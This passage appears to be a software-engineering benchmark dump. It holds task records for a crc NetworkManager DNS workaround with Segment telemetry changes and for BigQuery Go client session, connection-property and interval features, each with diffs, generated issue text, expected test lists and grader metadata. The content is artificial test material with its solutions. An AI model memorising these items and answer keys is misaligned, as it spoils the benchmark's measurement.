err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) }
fedora33: Workaround NetworkManager bug with systemd-resolved crc DNS configuration on systems using systemd-resolved is done through a NetworkManager dispatcher file which gets run when the crc bridge is created by libvirt. This file then uses resolvectl to configure the bridge as the interface to use for resolving names in the .testing domain. However, NetworkManager will overwrite this resolvectl configuration every time a network connection goes up/down. This is a NetworkManager bug which is fixed in version 1.26.6 by this commit: https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe This commit changes the dispatcher script to run every time any network interface changes state so that we restore crc DNS configuration after NM overwrites it. This workaround can be removed in a few weeks/months once the NetworkManager package is upgraded in Fedora (I did not check if ubuntu is impacted). This fixes https://github.com/code-ready/crc/issues/1773 ## Testing Using a fedora 33 system with NetworkManager older than 1.26.6 1. after `crc setup`, `resolvectl domain` shows Link x (crc): ~testing 2. start/stop a NM connection with a search domain set (nmcli conn, nmcli conn show $conn |grep ipv4.dns-search, nmcli conn modify $conn ipv4.dns-search ~example.com, nmcli conn down $conn, nmcli conn up $conn) - just stopping/starting the VPN does the tric on my system 3. check `resolvectl domain` again - before this patch, `~testing` is gone, after this patch `~testing` is still present
**Title** Improve NetworkManager DNS dispatcher handling and enrich telemetry reporting **Problem** - On systems where NetworkManager overwrites `resolvectl` settings, the CRC split‑DNS configuration is lost after any network connection change. - Telemetry uploads previously did not capture command execution duration nor correctly distinguish successful from failed actions. **Root Cause** - The dispatcher script was tied to a single event and located in a legacy path, so it was not re‑executed when NetworkManager altered DNS. - The telemetry client used an `Identify` call without duration or success information and ignored upload errors. **Fix / Expected Behavior** - Relocate the dispatcher script to the proper NetworkManager dispatcher directory and ensure it runs on every interface state change, restoring the CRC DNS settings automatically. - Remove the obsolete script location from previous releases. - Simplify the script to always apply the required `resolvectl` configuration. - Extend the telemetry API to accept execution duration, report success status, include OS information, and use a `Track` event. - Propagate any upload errors back to the caller and log failures only at debug level. **Risk & Validation** - Verify that the new dispatcher script restores CRC DNS after any NetworkManager up/down event without affecting other connections. - Confirm that telemetry events contain `duration`, `success`, and appropriate error details, and that they are sent reliably. - Test on a Fedora 33 system with an older NetworkManager version and run the CRC setup flow, checking that the `~testing` domain remains present after toggling a network connection.
1,819
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select {
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(self, action string, duration time.Duration, err error) error Location: pkg/crc/segment/segment.go Inputs: - action (string) – name of the telemetry event (e.g., “start”). - duration (time.Duration) – elapsed time of the command execution; sent as duration (ms) in the event properties. - err (error) – error returned by the command; nil means success. When non‑nil its Error() string is added to the event properties. Outputs: - error  – returns nil on success, or any error produced while preparing the payload or enqueuing it to Segment (including consent‑disabled short‑circuit). The function always returns after attempting to send telemetry, never propagates the original err parameter. Description: Sends a telemetry event to Segment. It first checks the telemetry consent flag, then builds an identify message with the OS trait and a track message with the given action, duration (in milliseconds) and optional error details, and enqueues them via the Segment client. Used by the CLI wrapper to report command execution results.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 3, "num_modified_lines": 49, "pr_author": "cfergeau", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "regression_bug" ], "reason": null, "reasoning": "The issue requests a workaround for a NetworkManager bug by moving the dispatcher script and cleaning up old files. The provided tests, however, exercise telemetry changes (new Upload signature, OS trait, duration) that are not mentioned in the issue, indicating a mismatch between the issue intent and test expectations. This mismatch is a classic case of test‑suite coupling, where fixing the issue would require unrelated changes to pass the tests, so the primary classification is B1.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect the segment.Upload function to accept a duration argument and to send Identify and Track events with OS and duration properties, which are not described in the issue.", "Tests assert presence of runtime.GOOS and duration fields in the payload, unrelated to the NetworkManager dispatcher fix." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6861b30cc43f17876894476e92305f2eb8ccfbff
2021-09-15 04:29:22
googleapis__google-cloud-go-4754
diff --git a/bigquery/job.go b/bigquery/job.go index 657d338e4b..510cdda054 100644 --- a/bigquery/job.go +++ b/bigquery/job.go @@ -375,6 +375,9 @@ type JobStatistics struct { // TransactionInfo indicates the transaction ID associated with the job, if any. TransactionInfo *TransactionInfo + + // SessionInfo contains information about the session if this job is part of one. + SessionInfo *SessionInfo } // Statistics is one of ExtractStatistics, LoadStatistics or QueryStatistics. @@ -884,6 +887,7 @@ func (j *Job) setStatistics(s *bq.JobStatistics, c *Client) { ScriptStatistics: bqToScriptStatistics(s.ScriptStatistics), ReservationUsage: bqToReservationUsage(s.ReservationUsage), TransactionInfo: bqToTransactionInfo(s.TransactionInfo), + SessionInfo: bqToSessionInfo(s.SessionInfo), } switch { case s.Extract != nil: @@ -1002,3 +1006,26 @@ func bqToTransactionInfo(in *bq.TransactionInfo) *TransactionInfo { TransactionID: in.TransactionId, } } + +// SessionInfo contains information about a session associated with a job. +type SessionInfo struct { + SessionID string +} + +func (s *SessionInfo) toBQ() *bq.SessionInfo { + if s == nil { + return nil + } + return &bq.SessionInfo{ + SessionId: s.SessionID, + } +} + +func bqToSessionInfo(in *bq.SessionInfo) *SessionInfo { + if in == nil { + return nil + } + return &SessionInfo{ + SessionID: in.SessionId, + } +} diff --git a/bigquery/query.go b/bigquery/query.go index 3ce018e942..b64ae06211 100644 --- a/bigquery/query.go +++ b/bigquery/query.go @@ -132,6 +132,12 @@ type QueryConfig struct { // Allows the schema of the destination table to be updated as a side effect of // the query job. SchemaUpdateOptions []string + + // CreateSession will trigger creation of a new session when true. + CreateSession bool + + // ConnectionProperties are optional key-values settings. 
+ ConnectionProperties []*ConnectionProperty } func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { @@ -147,6 +153,7 @@ func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { Clustering: qc.Clustering.toBQ(), DestinationEncryptionConfiguration: qc.DestinationEncryptionConfig.toBQ(), SchemaUpdateOptions: qc.SchemaUpdateOptions, + CreateSession: qc.CreateSession, } if len(qc.TableDefinitions) > 0 { qconf.TableDefinitions = make(map[string]bq.ExternalDataConfiguration) @@ -195,6 +202,13 @@ func (qc *QueryConfig) toBQ() (*bq.JobConfiguration, error) { } qconf.QueryParameters = append(qconf.QueryParameters, qp) } + if len(qc.ConnectionProperties) > 0 { + bqcp := make([]*bq.ConnectionProperty, len(qc.ConnectionProperties)) + for k, v := range qc.ConnectionProperties { + bqcp[k] = v.toBQ() + } + qconf.ConnectionProperties = bqcp + } return &bq.JobConfiguration{ Labels: qc.Labels, DryRun: qc.DryRun, @@ -219,6 +233,7 @@ func bqToQueryConfig(q *bq.JobConfiguration, c *Client) (*QueryConfig, error) { Clustering: bqToClustering(qq.Clustering), DestinationEncryptionConfig: bqToEncryptionConfig(qq.DestinationEncryptionConfiguration), SchemaUpdateOptions: qq.SchemaUpdateOptions, + CreateSession: qq.CreateSession, } qc.UseStandardSQL = !qc.UseLegacySQL @@ -255,6 +270,13 @@ func bqToQueryConfig(q *bq.JobConfiguration, c *Client) (*QueryConfig, error) { } qc.Parameters = append(qc.Parameters, p) } + if len(qq.ConnectionProperties) > 0 { + props := make([]*ConnectionProperty, len(qq.ConnectionProperties)) + for k, v := range qq.ConnectionProperties { + props[k] = bqToConnectionProperty(v) + } + qc.ConnectionProperties = props + } return qc, nil } @@ -402,6 +424,7 @@ func (q *Query) probeFastPath() (*bq.QueryRequest, error) { pfalse := false qRequest := &bq.QueryRequest{ Query: q.QueryConfig.Q, + CreateSession: q.CreateSession, Location: q.Location, UseLegacySql: &pfalse, MaximumBytesBilled: q.QueryConfig.MaxBytesBilled, @@ -427,3 +450,31 @@ func (q *Query) 
probeFastPath() (*bq.QueryRequest, error) { } return qRequest, nil } + +// ConnectionProperty represents a single key and value pair that can be sent alongside a query request. +type ConnectionProperty struct { + // Name of the connection property to set. + Key string + // Value of the connection property. + Value string +} + +func (cp *ConnectionProperty) toBQ() *bq.ConnectionProperty { + if cp == nil { + return nil + } + return &bq.ConnectionProperty{ + Key: cp.Key, + Value: cp.Value, + } +} + +func bqToConnectionProperty(in *bq.ConnectionProperty) *ConnectionProperty { + if in == nil { + return nil + } + return &ConnectionProperty{ + Key: in.Key, + Value: in.Value, + } +}
feat(bigquery): add session and connection support Adds: * CreateSession to Query config * ConnectionProperties to specify connection keys/values in Query config * SessionInfo in JobStatistics to record session stats Also contains some minor test refactoring to make it easier to test query execution.
**Title** Add BigQuery session creation and connection property support to query configuration and job statistics **Problem** Clients could not request a new session for a query nor specify custom connection key‑value settings. Additionally, job statistics did not expose any information about the session a job belonged to, limiting observability. **Root Cause** The query configuration and job‑statistics data models omitted fields required for session control and connection properties, so the API never transmitted or returned this information. **Fix / Expected Behavior** - Query configuration now accepts a flag to create a session and a list of connection key‑value pairs. - Session creation flag is included in the fast‑path request sent to BigQuery. - Job statistics surface session identifiers when a job is part of a session. - Internal conversion logic maps these new fields to and from the underlying BigQuery protobuf structures. - New types representing connection properties and session information are provided for client use. **Risk & Validation** - Verify that existing query workflows continue to work unchanged when the new fields are omitted. - Add tests that a query with the session flag set creates a session and that connection properties are correctly round‑tripped. - Perform integration checks to ensure the session identifier appears in job statistics for jobs executed within a session.
4,754
googleapis/google-cloud-go
diff --git a/bigquery/integration_test.go b/bigquery/integration_test.go index 2526392b37..de9b2a5847 100644 --- a/bigquery/integration_test.go +++ b/bigquery/integration_test.go @@ -479,7 +479,7 @@ func TestIntegration_SnapshotAndRestore(t *testing.T) { FROM UNNEST(GENERATE_ARRAY(0,999)) `, qualified) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatalf("couldn't instantiate base table: %v", err) } @@ -872,7 +872,7 @@ func TestIntegration_DatasetUpdateAccess(t *testing.T) { sql := fmt.Sprintf(` CREATE FUNCTION `+"`%s`"+`(x INT64) AS (x * 3);`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -1288,7 +1288,7 @@ func TestIntegration_RoutineStoredProcedure(t *testing.T) { END`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -2014,7 +2014,7 @@ func TestIntegration_DML(t *testing.T) { ('b', [1], STRUCT<BOOL>(FALSE)), ('c', [2], STRUCT<BOOL>(TRUE))`, table.DatasetID, table.TableID) - stats, err := runQueryJob(ctx, sql) + _, stats, err := runQuerySQL(ctx, sql) if err != nil { t.Fatal(err) } @@ -2036,12 +2036,18 @@ func TestIntegration_DML(t *testing.T) { } } +// runQuerySQL runs arbitrary SQL text. +func runQuerySQL(ctx context.Context, sql string) (*JobStatistics, *QueryStatistics, error) { + return runQueryJob(ctx, client.Query(sql)) +} + // runQueryJob is useful for running queries where no row data is returned (DDL/DML). 
-func runQueryJob(ctx context.Context, sql string) (*QueryStatistics, error) { - var stats *QueryStatistics +func runQueryJob(ctx context.Context, q *Query) (*JobStatistics, *QueryStatistics, error) { + var jobStats *JobStatistics + var queryStats *QueryStatistics var err error err = internal.Retry(ctx, gax.Backoff{}, func() (stop bool, err error) { - job, err := client.Query(sql).Run(ctx) + job, err := q.Run(ctx) if err != nil { if e, ok := err.(*googleapi.Error); ok && e.Code < 500 { return true, err // fail on 4xx @@ -2057,13 +2063,14 @@ func runQueryJob(ctx context.Context, sql string) (*QueryStatistics, error) { } status := job.LastStatus() if status.Statistics != nil { + jobStats = status.Statistics if qStats, ok := status.Statistics.Details.(*QueryStatistics); ok { - stats = qStats + queryStats = qStats } } return true, nil }) - return stats, err + return jobStats, queryStats, err } func TestIntegration_TimeTypes(t *testing.T) { @@ -2103,7 +2110,7 @@ func TestIntegration_TimeTypes(t *testing.T) { "VALUES ('%s', '%s', '%s', '%s')", table.DatasetID, table.TableID, d, CivilTimeString(tm), CivilDateTimeString(dtm), ts.Format("2006-01-02 15:04:05")) - if _, err := runQueryJob(ctx, query); err != nil { + if _, _, err := runQuerySQL(ctx, query); err != nil { t.Fatal(err) } wantRows = append(wantRows, wantRows[0]) @@ -2275,6 +2282,44 @@ func TestIntegration_QueryExternalHivePartitioning(t *testing.T) { checkReadAndTotalRows(t, "HiveQuery", it, [][]Value{{int64(50)}}) } +func TestIntegration_QuerySessionSupport(t *testing.T) { + if client == nil { + t.Skip("Integration tests skipped") + } + ctx := context.Background() + + q := client.Query("CREATE TEMPORARY TABLE temptable AS SELECT 17 as foo") + q.CreateSession = true + jobStats, _, err := runQueryJob(ctx, q) + if err != nil { + t.Fatalf("error running CREATE TEMPORARY TABLE: %v", err) + } + if jobStats.SessionInfo == nil { + t.Fatalf("expected session info, was nil") + } + sessionID := 
jobStats.SessionInfo.SessionID + if len(sessionID) == 0 { + t.Errorf("expected non-empty sessionID") + } + + q2 := client.Query("SELECT * FROM temptable") + q2.ConnectionProperties = []*ConnectionProperty{ + {Key: "session_id", Value: sessionID}, + } + jobStats, _, err = runQueryJob(ctx, q2) + if err != nil { + t.Errorf("error running SELECT: %v", err) + } + if jobStats.SessionInfo == nil { + t.Fatalf("expected sessionInfo in second query, was nil") + } + got := jobStats.SessionInfo.SessionID + if got != sessionID { + t.Errorf("second query mismatched session ID, got %s want %s", got, sessionID) + } + +} + func TestIntegration_QueryParameters(t *testing.T) { if client == nil { t.Skip("Integration tests skipped") @@ -2560,7 +2605,7 @@ func TestIntegration_ExtractExternal(t *testing.T) { sql := fmt.Sprintf(`INSERT %s.%s (name, num) VALUES ('a', 1), ('b', 2), ('c', 3)`, table.DatasetID, table.TableID) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } // Extract to a GCS object as CSV. 
@@ -2986,7 +3031,7 @@ func TestIntegration_MaterializedViewLifecycle(t *testing.T) { FROM UNNEST(GENERATE_ARRAY(0,999)) `, qualified) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatalf("couldn't instantiate base table: %v", err) } @@ -3114,7 +3159,7 @@ func TestIntegration_ModelLifecycle(t *testing.T) { UNION ALL SELECT 'b' AS f1, 3.8 AS label )`, modelRef) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer model.Delete(ctx) @@ -3297,7 +3342,7 @@ func TestIntegration_RoutineComplexTypes(t *testing.T) { (SELECT SUM(IF(elem.name = "foo",elem.val,null)) FROM UNNEST(arr) AS elem) )`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -3357,7 +3402,7 @@ func TestIntegration_RoutineLifecycle(t *testing.T) { sql := fmt.Sprintf(` CREATE FUNCTION `+"`%s`"+`(x INT64) AS (x * 3);`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) diff --git a/bigquery/query_test.go b/bigquery/query_test.go index f3d9660201..3b292b77b9 100644 --- a/bigquery/query_test.go +++ b/bigquery/query_test.go @@ -323,6 +323,27 @@ func TestQuery(t *testing.T) { return j }(), }, + { + dst: c.Dataset("dataset-id").Table("table-id"), + src: &QueryConfig{ + Q: "query string", + DefaultProjectID: "def-project-id", + DefaultDatasetID: "def-dataset-id", + ConnectionProperties: []*ConnectionProperty{ + {Key: "key-a", Value: "value-a"}, + {Key: "key-b", Value: "value-b"}, + }, + }, + want: func() *bq.Job { + j := defaultQueryJob() + j.Configuration.Query.ForceSendFields = nil + j.Configuration.Query.ConnectionProperties = []*bq.ConnectionProperty{ + {Key: "key-a", Value: "value-a"}, + {Key: "key-b", Value: "value-b"}, + } + 
return j + }(), + }, } for i, tc := range testCases { query := c.Query("")
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/NaN", "TestNullFloat64JSON/minus_short_infinity", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/empty", 
"TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Function: runQueryJob(ctx context.Context, q *Query) (*JobStatistics, *QueryStatistics, error) Location: bigquery/integration_test.go (production implementation in bigquery/job.go is unchanged; test calls the exported helper) Inputs: - ctx – request‑level context controlling cancellation and deadlines. - q – a *bigquery.Query object that encapsulates the SQL text, destination, and the new fields CreateSession and ConnectionProperties. Outputs: - *JobStatistics – job‑level metrics, now includes SessionInfo when a session is created. - *QueryStatistics – query‑specific statistics (row count, bytes processed, etc.). - error – any failure while starting or monitoring the job (including 4xx HTTP errors that abort retries). Description: Executes the supplied Query object as a BigQuery job and returns both job‑wide and query‑specific statistics. The signature change allows callers to pass a fully built Query (with session‑related options) and to retrieve session information from the returned JobStatistics. Struct: QueryConfig Location: bigquery/query.go Fields (new/changed): - CreateSession bool – when true, BigQuery creates a new temporary session for the query. - ConnectionProperties []*ConnectionProperty – optional key/value pairs sent with the query request (e.g., session_id). Description: Configuration object used by Query to build the underlying BigQuery job configuration. The added fields enable session creation and the passing of arbitrary connection properties. Struct: ConnectionProperty Location: bigquery/query.go Fields: - Key string – name of the connection property. - Value string – value of the connection property. Description: Represents a single key/value pair that can be attached to a Query via QueryConfig.ConnectionProperties. Used by the test to propagate a session ID to a subsequent query. Method: (*ConnectionProperty) toBQ() *bq.ConnectionProperty Location: bigquery/query.go Inputs: the receiver ConnectionProperty instance. 
Outputs: pointer to the corresponding protobuf representation used by the BQ client library. Description: Converts the public ConnectionProperty into the internal *bq.ConnectionProperty type required by the BigQuery API request. Struct: JobStatistics Location: bigquery/job.go Field (new): - SessionInfo *SessionInfo – populated when a job runs within a session. Description: Holds aggregate statistics for a completed job. The new SessionInfo field allows callers (e.g., the integration test) to retrieve the session identifier associated with the job. Struct: SessionInfo Location: bigquery/job.go Field: - SessionID string – identifier of the temporary session created for the job. Description: Encapsulates session metadata returned by BigQuery. Tests verify that a non‑empty SessionID is present after creating a temporary table with CreateSession=true and that the same ID is used in a subsequent query via ConnectionProperties.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 2, "num_modified_lines": 78, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "cla: yes: This human has signed the Contributor License Agreement.", "automerge: Merge the pull request once unit tests and other checks pass." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding session creation and connection properties to BigQuery queries and exposing session info in job statistics, which the tests verify. The provided test changes align with these requirements, checking that the new fields are set and that session IDs propagate. No signals of missing specifications, external dependencies, or hidden naming expectations are present. 
Therefore the task is clearly defined and solvable as described.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1c145f401131666e94fb3159d6967fddc007abcf
2022-04-18 21:20:52
googleapis__google-cloud-go-5907
diff --git a/bigquery/intervalvalue.go b/bigquery/intervalvalue.go new file mode 100644 index 0000000000..dc4510c33f --- /dev/null +++ b/bigquery/intervalvalue.go @@ -0,0 +1,321 @@ +// Copyright 2022 Google LLC +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package bigquery + +import ( + "bytes" + "fmt" + "strconv" + "time" +) + +// IntervalValue is a go type for representing BigQuery INTERVAL values. +// Intervals are represented using three distinct parts: +// * Years and Months +// * Days +// * Time (Hours/Mins/Seconds/Fractional Seconds). +// +// More information about BigQuery INTERVAL types can be found at: +// https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#interval_type +// +// IntervalValue is EXPERIMENTAL and subject to change or removal without notice. +type IntervalValue struct { + // In canonical form, Years and Months share a consistent sign and reduced + // to avoid large 